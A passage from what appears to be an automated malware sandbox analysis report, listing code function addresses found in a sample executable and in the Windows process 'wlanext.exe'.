          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A7D5E03_2_00A7D5E0
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A60D203_2_00A60D20
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00B31D553_2_00B31D55
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A86E303_2_00A86E30
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_1_0041B8693_1_0041B869
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_1_0041C07B3_1_0041C07B
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_1_0041C8043_1_0041C804
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_1_004010303_1_00401030
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_1_004011743_1_00401174
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_1_0041B9853_1_0041B985
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_1_0041CB983_1_0041CB98
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03152B289_2_03152B28
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030BEBB09_2_030BEBB0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0314DBD29_2_0314DBD2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_031403DA9_2_031403DA
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_031522AE9_2_031522AE
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0308F9009_2_0308F900
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030A41209_2_030A4120
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_031410029_2_03141002
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0315E8249_2_0315E824
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0309B0909_2_0309B090
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030B20A09_2_030B20A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_031520A89_2_031520A8
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_031528EC9_2_031528EC
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0315DFCE9_2_0315DFCE
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03151FF19_2_03151FF1
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0314D6169_2_0314D616
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030A6E309_2_030A6E30
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03152EF79_2_03152EF7
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03152D079_2_03152D07
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03080D209_2_03080D20
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03151D559_2_03151D55
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030B25819_2_030B2581
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_031525DD9_2_031525DD
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0309D5E09_2_0309D5E0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0309841F9_2_0309841F
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0314D4669_2_0314D466
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0086C8049_2_0086C804
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0086CB989_2_0086CB98
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_00858C2B9_2_00858C2B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_00858C6B9_2_00858C6B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_00858C709_2_00858C70
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0086C58E9_2_0086C58E
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_00852D909_2_00852D90
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0086CFA09_2_0086CFA0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_00852FB0